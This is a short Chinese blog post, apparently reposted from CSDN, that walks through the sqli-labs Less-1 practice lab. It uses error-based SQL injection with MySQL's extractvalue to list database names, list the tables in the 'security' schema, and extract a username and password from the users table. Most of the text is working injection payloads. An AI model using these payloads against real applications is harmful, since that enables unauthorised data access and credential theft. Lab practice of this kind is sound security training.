sqli-labs less-1(报错注入之extractvalue)

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

目录

 less-1(报错注入之extractvalue)

1.原理

2.爆破所有库

3爆破security的所有表名

4.查询users的第三行数据

1.原理

img

2.爆破所有库

所有数据库名

img

?id=1’ and extractvalue(1,concat(0x7e,(select database()),0x7e))-- -

?id=1' and extractvalue(1,concat(0x7e,(select substr(group_concat(schema_name),1,31) from information_schema.schemata)))-- - #字母限制仅能显示31个

img

?id=1' and extractvalue(1,concat(0x7e,(select substr(group_concat(schema_name),32,31) from information_schema.schemata)))-- -

img

?id=1' and extractvalue(1,concat(0x7e,(select substr(group_concat(schema_name),63,31) from information_schema.schemata)))-- - 

img

3爆破security的所有表名

Security的所有表名

img

?id=1’ and extractvalue(1,concat(0x7e,( select group_concat(table_name) from information_schema.tables where table_schema=’security’),0x7e))-- -

img

4.查询users的第三行数据

img

?id=1’ and extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users where id=3),0x7e))-- -

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125823000
-- 展开阅读全文 --
安全面试之XSS(跨站脚本攻击)
« 上一篇 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复